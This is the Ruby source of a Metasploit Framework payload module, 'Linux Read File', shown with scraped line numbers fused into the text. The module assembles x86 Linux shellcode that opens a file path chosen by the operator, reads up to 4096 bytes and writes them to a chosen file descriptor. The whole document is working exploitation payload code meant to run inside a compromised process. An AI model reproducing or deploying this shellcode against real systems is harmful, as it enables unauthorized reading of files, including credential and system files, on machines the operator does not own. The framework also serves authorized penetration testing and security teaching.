Path: blob/master/modules/payloads/singles/linux/x86/read_file.rb
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule67CachedSize = 6389include Msf::Payload::Single10include Msf::Payload::Linux1112def initialize(info = {})13super(merge_info(info,14'Name' => 'Linux Read File',15'Version' => '',16'Description' => 'Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor',17'Author' => 'hal',18'License' => MSF_LICENSE,19'Platform' => 'linux',20'Arch' => ARCH_X86))2122# Register exec options23register_options(24[25OptString.new('PATH', [ true, "The file path to read" ]),26OptString.new('FD', [ true, "The file descriptor to write output to", 1 ]),27])28end2930def generate(opts={})31fd = datastore['FD']3233payload_data =<<-EOS34jmp file3536open:37mov eax,0x5 ; open() syscall38pop ebx ; Holds the filename39xor ecx,ecx ; Open for reading (0)40int 0x804142read:43mov ebx,eax ; Store the open fd44mov eax,0x3 ; read() syscall45mov edi,esp ; We're just going to save on the stack46mov ecx,edi ; Save at edi47mov edx,0x1000 ; Read as much as we can48int 0x804950write:51mov edx,eax ; Number of bytes to write52mov eax,0x4 ; write() system call53mov ebx,#{fd} ; fd to write to54int 0x805556exit:57mov eax,0x1 ; exit() system call58mov ebx,0x0 ; return 059int 0x806061file:62call open63db "#{datastore['PATH']}", 0x0064EOS6566Metasm::Shellcode.assemble(Metasm::Ia32.new, payload_data).encode_string67end68end697071